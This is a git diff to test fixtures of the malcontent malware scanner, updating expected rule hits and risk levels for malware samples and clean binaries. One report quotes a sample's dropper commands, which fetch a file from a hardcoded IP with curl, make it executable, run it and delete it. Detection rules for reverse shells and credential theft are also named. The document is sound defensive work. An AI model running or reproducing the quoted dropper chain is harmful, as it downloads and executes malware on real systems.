[25.34.35.14](https://github.com/search?q=25.34.35.14&type=code)
[26.45.35.92](https://github.com/search?q=26.45.35.92&type=code)
[26.45.64.83](https://github.com/search?q=26.45.64.83&type=code)
[26.47.64.85](https://github.com/search?q=26.47.64.85&type=code)
[27.52.74.77](https://github.com/search?q=27.52.74.77&type=code)
[288.146.686.257](https://github.com/search?q=288.146.686.257&type=code)
[288.257.686.318](https://github.com/search?q=288.257.686.318&type=code)
[294.169.558.47](https://github.com/search?q=294.169.558.47&type=code)
[311.178.743.311](https://github.com/search?q=311.178.743.311&type=code)
[311.311.743.384](https://github.com/search?q=311.311.743.384&type=code)
[325.737.732.76](https://github.com/search?q=325.737.732.76&type=code)
[335.749.748.752](https://github.com/search?q=335.749.748.752&type=code)
[347.763.768.74](https://github.com/search?q=347.763.768.74&type=code)
[407.325.737.732](https://github.com/search?q=407.325.737.732&type=code)
[414.335.749.748](https://github.com/search?q=414.335.749.748&type=code)
[422.347.763.768](https://github.com/search?q=422.347.763.768&type=code)
[427.41.993.498](https://github.com/search?q=427.41.993.498&type=code)
[486.21.507.477](https://github.com/search?q=486.21.507.477&type=code)
[515.24.49.525](https://github.com/search?q=515.24.49.525&type=code)
[52.14.93.54](https://github.com/search?q=52.14.93.54&type=code)
[585.33.579.602](https://github.com/search?q=585.33.579.602&type=code)
[65.65.98.98](https://github.com/search?q=65.65.98.98&type=code)
[652.193.936.325](https://github.com/search?q=652.193.936.325&type=code)
[662.198.172.14](https://github.com/search?q=662.198.172.14&type=code)
[678.243.427.41](https://github.com/search?q=678.243.427.41&type=code)
[732.76.734.734](https://github.com/search?q=732.76.734.734&type=code)
[737.325.76.732](https://github.com/search?q=737.325.76.732&type=code)
[737.732.76.157](https://github.com/search?q=737.732.76.157&type=code)
[751.338.748.752](https://github.com/search?q=751.338.748.752&type=code)
[76.732.734.734](https://github.com/search?q=76.732.734.734&type=code)
[78.24.65.51](https://github.com/search?q=78.24.65.51&type=code)
[83.26.47.64](https://github.com/search?q=83.26.47.64&type=code)
[88.39.55.87](https://github.com/search?q=88.39.55.87&type=code)
[92.97.47.52](https://github.com/search?q=92.97.47.52&type=code)
[942.12.872.258](https://github.com/search?q=942.12.872.258&type=code)
[97.47.52.84](https://github.com/search?q=97.47.52.84&type=code) | | +MEDIUM | **[credential/keychain](https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/keychain/keychain.yara#keychain)** | May access the macOS keychain | [keychain](https://github.com/search?q=keychain&type=code) | | +MEDIUM | **[crypto/blockchain](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/blockchain.yara#blockchain)** | blockchain | [blockchain](https://github.com/search?q=blockchain&type=code) | | +MEDIUM | **[crypto/uuid](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/uuid.yara#random_uuid)** | generates a random UUID | [randomUUID](https://github.com/search?q=randomUUID&type=code) | diff --git a/tests/javascript/clean/connection.js.simple b/tests/javascript/clean/connection.js.simple index f12daff62..17d1d7075 100644 --- a/tests/javascript/clean/connection.js.simple +++ b/tests/javascript/clean/connection.js.simple @@ -1,6 +1,7 @@ # javascript/clean/connection.js: high anti-static/base64/exec: high anti-static/obfuscation/generic/hex_conversion: medium +c2/addr/ip: medium credential/password: low data/embedded/base64_terms: medium data/embedded/base64_url: medium diff --git a/tests/linux/2021.FontOnLake/45E9.elf.simple b/tests/linux/2021.FontOnLake/45E9.elf.simple index 11e2c16ae..9ecc2fe8e 100644 --- a/tests/linux/2021.FontOnLake/45E9.elf.simple +++ b/tests/linux/2021.FontOnLake/45E9.elf.simple @@ -2,6 +2,7 @@ 3P/elastic/rootkit_fontonlake: critical 3P/sig_base/susp_elf_upx: critical anti-static/packer/upx: high +c2/addr/ip: high c2/addr/ip_port: medium credential/password: low credential/ssh: medium diff --git a/tests/linux/2022.Symbiote/kerneldev.so.bkp.simple b/tests/linux/2022.Symbiote/kerneldev.so.bkp.simple index f4f365a1f..d8364dc9c 100644 --- a/tests/linux/2022.Symbiote/kerneldev.so.bkp.simple +++ b/tests/linux/2022.Symbiote/kerneldev.so.bkp.simple @@ -1,5 +1,6 @@ # linux/2022.Symbiote/kerneldev.so.bkp: critical 3P/threat_hunting/keylogger: medium +c2/addr/ip: high c2/discovery/ip_dns_resolver: medium credential/keylogger: medium credential/password: low diff --git a/tests/linux/2023.Kinsing/install.sh.simple b/tests/linux/2023.Kinsing/install.sh.simple index f058100cf..69a0bb91c 100644 --- a/tests/linux/2023.Kinsing/install.sh.simple +++ b/tests/linux/2023.Kinsing/install.sh.simple @@ -6,7 +6,6 @@ 3P/threat_hunting/xmrig: medium anti-static/base64/exec: high c2/addr/http_ip: high -c2/addr/ip: medium c2/addr/ip_port: high c2/tool_transfer/download: medium c2/tool_transfer/http_ip_temp: critical @@ -21,10 +20,11 @@ evasion/bypass_security/linux/iptables: medium evasion/bypass_security/linux/se: medium evasion/bypass_security/linux/se_disable: high evasion/bypass_security/linux/ufw: medium +evasion/covert_location/dev_shm: critical evasion/hidden_paths/dev_shm: critical -evasion/hidden_paths/etc_ld.so.preload: high evasion/hidden_paths/hidden: high evasion/hidden_paths/var_tmp: medium +evasion/hijack_execution/etc_ld.so.preload: high evasion/logging/syslog: medium evasion/mimicry/fake_process: critical exec/install_additional/package_install: medium @@ -35,7 +35,6 @@ exec/shell/pipe_sh: medium exec/system_controls/apparmor: high exec/system_controls/stop: low exec/system_controls/systemd: medium -exfil/stealer/ssh: high fs/attributes/chattr: high fs/directory/create: low fs/file/delete: medium diff --git a/tests/linux/2024.Beast/wyoming-xray-undress-robert.simple b/tests/linux/2024.Beast/wyoming-xray-undress-robert.simple new file mode 100644 index 000000000..77a248d51 --- /dev/null +++ b/tests/linux/2024.Beast/wyoming-xray-undress-robert.simple @@ -0,0 +1,10 @@ +# linux/2024.Beast/wyoming-xray-undress-robert: critical +fs/path/dev: medium +fs/path/tmp: medium +impact/ransom/linux: high +impact/shutdown: medium +lateral/vmware/vms: medium +malware/family/beast: critical +persist/daemon: medium +process/create: low +process/multithreaded: low diff --git a/tests/linux/2024.Darkcracks/darkcracks.sh.md b/tests/linux/2024.Darkcracks/darkcracks.sh.md index a61e3bbb0..eca36a716 100644 --- a/tests/linux/2024.Darkcracks/darkcracks.sh.md +++ b/tests/linux/2024.Darkcracks/darkcracks.sh.md @@ -3,7 +3,7 @@ | RISK | KEY | DESCRIPTION | EVIDENCE | |----------|---------------------------------------------------------------------------------------------------------------------------------------------------------------------|----------------------------------------------------------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| | CRITICAL | [c2/tool_transfer/shell](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/shell.yara#curl_chmod_relative_run_tiny) | change dir, fetch file, make it executable, and run it | [./agr](https://github.com/search?q=.%2Fagr&type=code)
[./wdvsh agr](https://github.com/search?q=.%2Fwdvsh+agr&type=code)
[cd /mnt](https://github.com/search?q=cd+%2Fmnt&type=code)
[cd /root](https://github.com/search?q=cd+%2Froot&type=code)
[cd /tmp](https://github.com/search?q=cd+%2Ftmp&type=code)
[cd /var/run](https://github.com/search?q=cd+%2Fvar%2Frun&type=code)
[chmod +x ./wdvsh](https://github.com/search?q=chmod+%2Bx+.%2Fwdvsh&type=code)
[curl http://179.191.68.85:82/vendor/sebastian/diff/src/Exception/j8UgL3v -o agr](https://github.com/search?q=curl+http%3A%2F%2F179.191.68.85%3A82%2Fvendor%2Fsebastian%2Fdiff%2Fsrc%2FException%2Fj8UgL3v+-o+agr&type=code) | -| CRITICAL | [evasion/hidden_paths/chdir_unusual](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/hidden_paths/chdir-unusual.yara#cd_val_obsessive) | changes directory to multiple unusual locations | [cd /;](https://github.com/search?q=cd+%2F%3B&type=code)
[cd /mnt](https://github.com/search?q=cd+%2Fmnt&type=code)
[cd /root](https://github.com/search?q=cd+%2Froot&type=code)
[cd /tmp](https://github.com/search?q=cd+%2Ftmp&type=code) | +| CRITICAL | [evasion/covert_location/chdir_unusual](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/covert-location/chdir-unusual.yara#cd_val_obsessive) | changes directory to multiple unusual locations | [cd /;](https://github.com/search?q=cd+%2F%3B&type=code)
[cd /mnt](https://github.com/search?q=cd+%2Fmnt&type=code)
[cd /root](https://github.com/search?q=cd+%2Froot&type=code)
[cd /tmp](https://github.com/search?q=cd+%2Ftmp&type=code) | | CRITICAL | [evasion/self_deletion/run_sleep_delete](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/self_deletion/run_sleep_delete.yara#run_sleep_delete) | run executable, sleep, and delete | [./wdvsh agr](https://github.com/search?q=.%2Fwdvsh+agr&type=code)
[chmod +x ./wdvsh](https://github.com/search?q=chmod+%2Bx+.%2Fwdvsh&type=code)
[rm ./agr](https://github.com/search?q=rm+.%2Fagr&type=code)
[rm ./wdvsh](https://github.com/search?q=rm+.%2Fwdvsh&type=code)
[sleep 3](https://github.com/search?q=sleep+3&type=code) | | CRITICAL | [net/download/fetch](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/download/fetch.yara#curl_download_ip) | Invokes curl to download a file from an IP | [curl http://179.191.68.85:82/vendor/sebastian/diff/src/Exception/j8UgL3v -o](https://github.com/search?q=curl+http%3A%2F%2F179.191.68.85%3A82%2Fvendor%2Fsebastian%2Fdiff%2Fsrc%2FException%2Fj8UgL3v+-o&type=code) | | HIGH | [c2/addr/http_ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/http-ip.yara#http_hardcoded_ip) | hardcoded IP address within a URL | [http://179.191.68.85:82/vendor/sebastian/diff/src/Ex](http://179.191.68.85:82/vendor/sebastian/diff/src/Ex) | diff --git a/tests/linux/2024.Kaiji/eight-nebraska-autumn-illinois.simple b/tests/linux/2024.Kaiji/eight-nebraska-autumn-illinois.simple index c854c3864..07d544000 100644 --- a/tests/linux/2024.Kaiji/eight-nebraska-autumn-illinois.simple +++ b/tests/linux/2024.Kaiji/eight-nebraska-autumn-illinois.simple @@ -26,7 +26,7 @@ exec/program: medium exec/shell/exec: medium exec/system_controls/systemd: medium exfil/stealer/linux_server: high -exfil/stealer/ssh: high +exfil/stealer/ssh: medium fs/directory/list: low fs/directory/remove: low fs/file/delete: low @@ -48,7 +48,6 @@ fs/permission/chown: medium fs/permission/get: low fs/permission/modify: medium fs/proc/stat: medium -impact/degrade/linux_paths: high impact/exploit/cve_list: medium impact/remote_access/kill_rm: medium impact/remote_access/reverse_shell: high diff --git a/tests/linux/2024.TellYouThePass/uranus-ack-mike-cat.simple b/tests/linux/2024.TellYouThePass/uranus-ack-mike-cat.simple new file mode 100644 index 000000000..2fa0f18ea --- /dev/null +++ b/tests/linux/2024.TellYouThePass/uranus-ack-mike-cat.simple @@ -0,0 +1,74 @@ +# linux/2024.TellYouThePass/uranus-ack-mike-cat: critical +3P/arkbird/solg_ran_elf: critical +3P/threat_hunting/torat: medium +c2/addr/ip_port: high +collect/databases/mysql: medium +collect/databases/postgresql: medium +collect/databases/sqlite: medium +credential/password: low +credential/shell/bash_history: high +crypto/aes: low +crypto/ecdsa: low +crypto/ed25519: low +data/encoding/base64: low +data/encoding/json: low +data/encoding/json_decode: low +data/hash/md5: low +discover/system/cpu_info: low +discover/system/hostname_get: low +discover/system/platform: low +discover/user/HOME: low +discover/user/USER: low +evasion/hidden_paths/hidden: medium +exec/cmd: medium +exec/plugin: low +exec/program: medium +exec/shell/background_sleep: medium +exec/shell/exec: medium +exec/shell/nohup: medium +exec/system_controls/stop: low +exec/system_controls/systemd: medium +exfil/office_file_ext: medium +exfil/stealer/office: high +fs/directory/remove: low +fs/file/delete: low +fs/file/make_executable: high +fs/file/read: low +fs/file/write: low +fs/path/etc: low +fs/path/etc_hosts: medium +fs/path/etc_initd: medium +fs/path/etc_resolv.conf: low +fs/path/relative: medium +fs/path/tmp: medium +fs/path/var: low +fs/permission/chown: medium +fs/permission/modify: medium +impact/ransom/note: high +impact/remote_access/reverse_shell: medium +net/dns: low +net/dns/servers: low +net/dns/txt: low +net/http/cookies: medium +net/http/post: medium +net/http/request: low +net/ip: low +net/ip/addr: medium +net/ip/multicast_send: low +net/ip/parse: medium +net/resolve/hostname: low +net/socket/listen: medium +net/socket/local_addr: low +net/socket/peer_address: low +net/socket/receive: low +net/socket/send: low +net/tcp/connect: medium +net/tcp/sftp: medium +net/tcp/ssh: medium +net/udp/receive: low +net/udp/send: low +net/url/request: medium +os/fd/sendfile: low +os/kernel/netlink: low +persist/daemon: medium +sus/exclamation: medium diff --git a/tests/linux/2024.hadooken/crondr_as_bash.sh.simple b/tests/linux/2024.hadooken/crondr_as_bash.sh.simple index 4a6b7d7f0..7010cb07e 100644 --- a/tests/linux/2024.hadooken/crondr_as_bash.sh.simple +++ b/tests/linux/2024.hadooken/crondr_as_bash.sh.simple @@ -1,5 +1,5 @@ # linux/2024.hadooken/crondr_as_bash.sh: critical -evasion/hidden_paths/chdir_unusual: high +evasion/covert_location/chdir_unusual: high evasion/mimicry/fake_process: high evasion/self_deletion/copy_run_delete: critical exec/shell/exec: medium diff --git a/tests/linux/2024.hadooken/ssh_worm.sh.simple b/tests/linux/2024.hadooken/ssh_worm.sh.simple index 70ef87cad..55554ebb8 100644 --- a/tests/linux/2024.hadooken/ssh_worm.sh.simple +++ b/tests/linux/2024.hadooken/ssh_worm.sh.simple @@ -3,6 +3,7 @@ anti-static/base64/eval: critical anti-static/base64/function_names: critical c2/addr/http_ip: high +c2/addr/ip: medium c2/tool_transfer/shell: medium credential/shell/bash_history: high credential/ssh: high diff --git a/tests/linux/2024.k4spreader/degrader.sh.simple b/tests/linux/2024.k4spreader/degrader.sh.simple index 8c438f33e..5d6c337f8 100644 --- a/tests/linux/2024.k4spreader/degrader.sh.simple +++ b/tests/linux/2024.k4spreader/degrader.sh.simple @@ -1,7 +1,7 @@ # linux/2024.k4spreader/degrader.sh: critical evasion/bypass_security/linux/iptables: medium evasion/bypass_security/linux/ufw: medium -evasion/hidden_paths/etc_ld.so.preload: high +evasion/hijack_execution/etc_ld.so.preload: high fs/attributes/chattr: medium fs/path/etc: low impact/degrade/iptables: high diff --git a/tests/linux/2024.k4spreader/knlib.simple b/tests/linux/2024.k4spreader/knlib.simple index 72ee35646..435f19650 100644 --- a/tests/linux/2024.k4spreader/knlib.simple +++ b/tests/linux/2024.k4spreader/knlib.simple @@ -1,5 +1,5 @@ # linux/2024.k4spreader/knlib: critical -evasion/hidden_paths/chdir_unusual: high +evasion/covert_location/chdir_unusual: high evasion/self_deletion/copy_run_delete: critical exec/shell/exec: medium exec/shell/ignore_output: medium diff --git a/tests/linux/2024.kworker_pretenders/emp3r0r.agent.simple b/tests/linux/2024.kworker_pretenders/emp3r0r.agent.simple index 66178e9ec..4849ffd18 100644 --- a/tests/linux/2024.kworker_pretenders/emp3r0r.agent.simple +++ b/tests/linux/2024.kworker_pretenders/emp3r0r.agent.simple @@ -40,7 +40,8 @@ discover/system/sysinfo: medium discover/user/HOME: low discover/user/USER: low discover/user/name_get: medium -evasion/hidden_paths/chdir_unusual: medium +evasion/covert_location/chdir_unusual: medium +evasion/covert_location/dev_shm: medium evasion/hidden_paths/dev_shm: critical evasion/hidden_paths/hidden: high evasion/hijack_execution/LD_LIBRARY_PATH: low diff --git a/tests/linux/2024.kworker_pretenders/gafgyt.simple b/tests/linux/2024.kworker_pretenders/gafgyt.simple index 3534215a8..d05ad257d 100644 --- a/tests/linux/2024.kworker_pretenders/gafgyt.simple +++ b/tests/linux/2024.kworker_pretenders/gafgyt.simple @@ -5,7 +5,7 @@ anti-static/packer/elf: high credential/ssh/d: medium data/base64/external: medium data/encoding/base64: low -evasion/hidden_paths/dev_shm: medium +evasion/covert_location/dev_shm: medium evasion/hidden_paths/var_run: medium evasion/hidden_paths/var_tmp: medium evasion/mimicry/fake_process: critical @@ -23,7 +23,6 @@ fs/path/usr_sbin: low fs/path/var: low fs/proc/arbitrary_pid: medium fs/proc/self_exe: medium -impact/degrade/linux_paths: high net/dns/servers: low net/http/request: low net/socket/send: low diff --git a/tests/linux/2024.medusa/rkload.simple b/tests/linux/2024.medusa/rkload.simple index 08d5bcc23..79a6bc7ad 100644 --- a/tests/linux/2024.medusa/rkload.simple +++ b/tests/linux/2024.medusa/rkload.simple @@ -6,11 +6,12 @@ anti-static/xor/commands: high credential/ssh/d: medium discover/system/cpu_info: low discover/system/sysinfo: medium +evasion/covert_location/dev_shm: high evasion/hidden_paths/dev_shm: critical -evasion/hidden_paths/etc_ld.so.preload: medium evasion/hidden_paths/hidden: high evasion/hide_artifacts/system_directories: medium evasion/hijack_execution/LD_LIBRARY_PATH: low +evasion/hijack_execution/etc_ld.so.preload: medium exec/conditional/LANG: low exec/dylib/address_check: low exec/dylib/symbol_address: medium @@ -34,7 +35,6 @@ fs/proc/stat: medium fs/tempdir: low fs/tempdir/TMPDIR: low hw/cpu: medium -impact/degrade/linux_paths: high impact/exploit/GCONV_PATH: low impact/remote_access/reverse_shell: medium impact/rootkit/readdir_interceptor: high diff --git a/tests/linux/2024.miner_dropper/drop.sh.simple b/tests/linux/2024.miner_dropper/drop.sh.simple index 162645272..c7fa07548 100644 --- a/tests/linux/2024.miner_dropper/drop.sh.simple +++ b/tests/linux/2024.miner_dropper/drop.sh.simple @@ -2,7 +2,7 @@ c2/addr/http_ip: high c2/addr/ip: medium c2/tool_transfer/shell: critical -evasion/hidden_paths/chdir_unusual: critical +evasion/covert_location/chdir_unusual: critical exec/shell/busybox_exec: high exec/shell/exec: medium exec/shell/relative_semicolon: high diff --git a/tests/linux/2024.sliver/de33b8d9694b6b4c44e3459b2151571af5d0e2031551f9f1a70b6db475ba71b2.elf.simple b/tests/linux/2024.sliver/de33b8d9694b6b4c44e3459b2151571af5d0e2031551f9f1a70b6db475ba71b2.elf.simple index 0152280c4..43567cf92 100644 --- a/tests/linux/2024.sliver/de33b8d9694b6b4c44e3459b2151571af5d0e2031551f9f1a70b6db475ba71b2.elf.simple +++ b/tests/linux/2024.sliver/de33b8d9694b6b4c44e3459b2151571af5d0e2031551f9f1a70b6db475ba71b2.elf.simple @@ -1,7 +1,8 @@ -# linux/2024.sliver/de33b8d9694b6b4c44e3459b2151571af5d0e2031551f9f1a70b6db475ba71b2.elf: high +# linux/2024.sliver/de33b8d9694b6b4c44e3459b2151571af5d0e2031551f9f1a70b6db475ba71b2.elf: critical anti-static/packer/elf: high anti-static/packer/high_entropy: medium anti-static/packer/upx: high +c2/addr/ip: high credential/sniffer/bpf: medium fs/path/dev: medium fs/proc/self_exe: medium diff --git a/tests/linux/clean/appsec-rules.json.simple b/tests/linux/clean/appsec-rules.json.simple index 94f37da54..21880ef60 100644 --- a/tests/linux/clean/appsec-rules.json.simple +++ b/tests/linux/clean/appsec-rules.json.simple @@ -35,7 +35,6 @@ exec/system_controls/apparmor: medium exec/tty/pathname: medium exfil: medium exfil/stealer/linux_server: high -exfil/stealer/ssh: high fs/fifo_create: low fs/file/times_set: medium fs/lock_update: low diff --git a/tests/linux/clean/chrome.simple b/tests/linux/clean/chrome.simple index d817e7c9e..83481e960 100644 --- a/tests/linux/clean/chrome.simple +++ b/tests/linux/clean/chrome.simple @@ -43,7 +43,7 @@ discover/system/sysinfo: medium discover/user/HOME: low discover/user/USER: low evasion/bypass_security/linux/ufw: medium -evasion/hidden_paths/dev_shm: medium +evasion/covert_location/dev_shm: medium evasion/hijack_execution/LD_LIBRARY_PATH: low evasion/process_injection/ptrace: medium exec/cmd: medium diff --git a/tests/linux/clean/clickhouse.simple b/tests/linux/clean/clickhouse.simple index 4846bce6a..31cafc926 100644 --- a/tests/linux/clean/clickhouse.simple +++ b/tests/linux/clean/clickhouse.simple @@ -52,7 +52,7 @@ discover/user/HOME: low discover/user/USER: low discover/user/name_get: low evasion/bypass_security/linux/ufw: medium -evasion/hidden_paths/dev_shm: medium +evasion/covert_location/dev_shm: medium evasion/hidden_paths/hidden: medium evasion/hidden_paths/relative_hidden: low evasion/hijack_execution/DYLD_LIBRARY_PATH: medium diff --git a/tests/linux/clean/containerd.simple b/tests/linux/clean/containerd.simple index bf3bbcfb2..809108804 100644 --- a/tests/linux/clean/containerd.simple +++ b/tests/linux/clean/containerd.simple @@ -27,8 +27,8 @@ discover/system/cpu_info: low discover/system/hostname_get: low discover/system/platform: medium discover/user/USER: low -evasion/hidden_paths/dev_mqueue: medium -evasion/hidden_paths/dev_shm: medium +evasion/covert_location/dev_mqueue: medium +evasion/covert_location/dev_shm: medium evasion/hidden_paths/var_run: medium evasion/process_injection/ptrace: medium exec/plugin: low @@ -72,7 +72,6 @@ fs/unmount: low fs/watch: low hw/dev/block_ice: medium hw/dev/mapper: medium -impact/degrade/linux_paths: medium impact/remote_access/heartbeat: medium net/dns: low net/dns/reverse: medium diff --git a/tests/linux/clean/default_config.json.simple b/tests/linux/clean/default_config.json.simple index f08d0ceba..92c43b7f1 100644 --- a/tests/linux/clean/default_config.json.simple +++ b/tests/linux/clean/default_config.json.simple @@ -36,7 +36,6 @@ exec/system_controls/apparmor: medium exec/tty/pathname: medium exfil: medium exfil/stealer/linux_server: high -exfil/stealer/ssh: high fs/fifo_create: low fs/file/times_set: medium fs/lock_update: low diff --git a/tests/linux/clean/ld-2.27.so.simple b/tests/linux/clean/ld-2.27.so.simple index 779b0b5bb..ed8d10b80 100644 --- a/tests/linux/clean/ld-2.27.so.simple +++ b/tests/linux/clean/ld-2.27.so.simple @@ -1,8 +1,8 @@ # linux/clean/ld-2.27.so: medium anti-behavior/LD_DEBUG: medium anti-behavior/LD_PROFILE: medium -evasion/hidden_paths/etc_ld.so.preload: medium evasion/hijack_execution/LD_LIBRARY_PATH: low +evasion/hijack_execution/etc_ld.so.preload: medium fs/path/etc: low fs/path/var: low fs/path/var_profile: medium diff --git a/tests/linux/clean/nvim.simple b/tests/linux/clean/nvim.simple index bc7a4826d..3f1bafa25 100644 --- a/tests/linux/clean/nvim.simple +++ b/tests/linux/clean/nvim.simple @@ -17,6 +17,7 @@ discover/system/platform: low discover/user/HOME: low discover/user/USER: low evasion/hidden_paths/hidden: medium +evasion/hidden_paths/x11: low exec/conditional/LANG: low exec/dylib/symbol_address: medium exec/plugin: low @@ -53,7 +54,6 @@ fs/tempdir/TEMP: low fs/tempdir/TMPDIR: low fs/tempdir/create: low fs/tempdir/tempfile_create: low -impact/degrade/linux_paths: medium net/dns/servers: low net/download/fetch: medium net/http/post: medium diff --git a/tests/linux/clean/pandoc.md b/tests/linux/clean/pandoc.md index c3c83a044..a25750e39 100644 --- a/tests/linux/clean/pandoc.md +++ b/tests/linux/clean/pandoc.md @@ -5,7 +5,6 @@ | HIGH | [impact/exploit/overflow_shellcode](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/exploit/overflow-shellcode.yara#exploit) | Buffer overflow exploit | [address](https://github.com/search?q=address&type=code)
[offset](https://github.com/search?q=offset&type=code)
[padding](https://github.com/search?q=padding&type=code)
[shellcode](https://github.com/search?q=shellcode&type=code) | | MEDIUM | [3P/threat_hunting/keylogger](https://github.com/chainguard-dev/malcontent/blob/main/rules/yara/threat_hunting/all.yara#keylogger_keyword_offensive_tool_keyword) | [references 'keylogger keyword' tool](https://github.com/mthcht/ThreatHunting-Keywords), by mthcht | [KeyLogger](https://github.com/search?q=KeyLogger&type=code) | | MEDIUM | [3P/threat_hunting/slowloris](https://github.com/chainguard-dev/malcontent/blob/main/rules/yara/threat_hunting/all.yara#SlowLoris_offensive_tool_keyword) | [references 'SlowLoris' tool](https://github.com/mthcht/ThreatHunting-Keywords), by mthcht | [Slowloris](https://github.com/search?q=Slowloris&type=code) | -| MEDIUM | [c2/addr/ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip.yara#hardcoded_ip) | hardcoded IP address | [138.112.25.25](https://github.com/search?q=138.112.25.25&type=code)
[14.22.331.22](https://github.com/search?q=14.22.331.22&type=code)
[141.14.22.331](https://github.com/search?q=141.14.22.331&type=code)
[223.264.47.556](https://github.com/search?q=223.264.47.556&type=code)
[264.47.556.673](https://github.com/search?q=264.47.556.673&type=code)
[284.411.537.896](https://github.com/search?q=284.411.537.896&type=code)
[411.537.896.621](https://github.com/search?q=411.537.896.621&type=code)
[47.556.673.848](https://github.com/search?q=47.556.673.848&type=code)
[556.673.848.284](https://github.com/search?q=556.673.848.284&type=code)
[673.848.284.411](https://github.com/search?q=673.848.284.411&type=code)
[848.284.411.537](https://github.com/search?q=848.284.411.537&type=code) | | MEDIUM | [c2/addr/ip_port](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip_port.yara#ip_and_port) | mentions an IP and port | [IP](https://github.com/search?q=IP&type=code)
[bindPort](https://github.com/search?q=bindPort&type=code)
[blIp](https://github.com/search?q=blIp&type=code)
[client_ip](https://github.com/search?q=client_ip&type=code)
[client_port](https://github.com/search?q=client_port&type=code)
[config_port](https://github.com/search?q=config_port&type=code)
[curlopt_port](https://github.com/search?q=curlopt_port&type=code)
[defaultPort](https://github.com/search?q=defaultPort&type=code)
[domain_port](https://github.com/search?q=domain_port&type=code)
[eIp](https://github.com/search?q=eIp&type=code)
[ereghet_ip](https://github.com/search?q=ereghet_ip&type=code)
[framed_ip](https://github.com/search?q=framed_ip&type=code)
[ftp_port](https://github.com/search?q=ftp_port&type=code)
[gamhet_ip](https://github.com/search?q=gamhet_ip&type=code)
[getPort](https://github.com/search?q=getPort&type=code)
[get_port](https://github.com/search?q=get_port&type=code)
[gomphet_ip](https://github.com/search?q=gomphet_ip&type=code)
[host_ip](https://github.com/search?q=host_ip&type=code)
[http_port](https://github.com/search?q=http_port&type=code)
[internal_ip](https://github.com/search?q=internal_ip&type=code)
[ipproto_ip](https://github.com/search?q=ipproto_ip&type=code)
[is_port](https://github.com/search?q=is_port&type=code)
[lat_port](https://github.com/search?q=lat_port&type=code)
[lloghet_ip](https://github.com/search?q=lloghet_ip&type=code)
[lnormhet_ip](https://github.com/search?q=lnormhet_ip&type=code)
[local_ip](https://github.com/search?q=local_ip&type=code)
[local_port](https://github.com/search?q=local_port&type=code)
[login_ip](https://github.com/search?q=login_ip&type=code)
[mIp](https://github.com/search?q=mIp&type=code)
[nas_ip](https://github.com/search?q=nas_ip&type=code)
[nas_port](https://github.com/search?q=nas_port&type=code)
[open_port](https://github.com/search?q=open_port&type=code)
[pg_port](https://github.com/search?q=pg_port&type=code)
[primary_ip](https://github.com/search?q=primary_ip&type=code)
[primary_port](https://github.com/search?q=primary_port&type=code)
[proxyPort](https://github.com/search?q=proxyPort&type=code)
[radius_port](https://github.com/search?q=radius_port&type=code)
[sam_port](https://github.com/search?q=sam_port&type=code)
[serverPort](https://github.com/search?q=serverPort&type=code)
[server_port](https://github.com/search?q=server_port&type=code)
[setPort](https://github.com/search?q=setPort&type=code)
[socketPort](https://github.com/search?q=socketPort&type=code)
[tcp_port](https://github.com/search?q=tcp_port&type=code)
[uriPort](https://github.com/search?q=uriPort&type=code)
[url_port](https://github.com/search?q=url_port&type=code)
[validate_ip](https://github.com/search?q=validate_ip&type=code)
[weibhet_ip](https://github.com/search?q=weibhet_ip&type=code)
[xIp](https://github.com/search?q=xIp&type=code) | | MEDIUM | [c2/addr/php](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/php.yara#http_url_with_php) | accesses hardcoded PHP endpoint | [http://www.fictionbook.org/index.php](http://www.fictionbook.org/index.php) | | MEDIUM | [c2/discovery/dyndns](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/discovery/dyndns.yara#dynamic_dns_user) | dynamic dns user | [dyndns](https://github.com/search?q=dyndns&type=code) | diff --git a/tests/linux/clean/redis-server.aarch64.md b/tests/linux/clean/redis-server.aarch64.md index ec23d2595..77be955cf 100644 --- a/tests/linux/clean/redis-server.aarch64.md +++ b/tests/linux/clean/redis-server.aarch64.md @@ -1,52 +1,51 @@ -## linux/clean/redis-server.aarch64 [🟠 HIGH] +## linux/clean/redis-server.aarch64 [🟡 MEDIUM] -| RISK | KEY | DESCRIPTION | EVIDENCE | -|--------|------------------------------------------------------------------------------------------------------------------------------------------------------------------|-------------------------------------------------------------------------------------------------------------------|------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| -| HIGH | [impact/degrade/linux_paths](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/degrade/linux_paths.yara#linux_critical_system_paths_small_elf) | ELF accesses multiple critical Linux paths | [/etc/sysctl.conf](https://github.com/search?q=%2Fetc%2Fsysctl.conf&type=code)
[/sys/devices/system/clocksource/clocksource0](https://github.com/search?q=%2Fsys%2Fdevices%2Fsystem%2Fclocksource%2Fclocksource0&type=code)
[/tmp/dump.bin](https://github.com/search?q=%2Ftmp%2Fdump.bin&type=code)
[/tmp/dump.hex](https://github.com/search?q=%2Ftmp%2Fdump.hex&type=code)
[/var/run/redis.pid](https://github.com/search?q=%2Fvar%2Frun%2Fredis.pid&type=code) | -| MEDIUM | [c2/addr/ip_port](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip_port.yara#ip_and_port) | mentions an IP and port | [IP](https://github.com/search?q=IP&type=code)
[bus_port](https://github.com/search?q=bus_port&type=code)
[host_port](https://github.com/search?q=host_port&type=code)
[master_port](https://github.com/search?q=master_port&type=code)
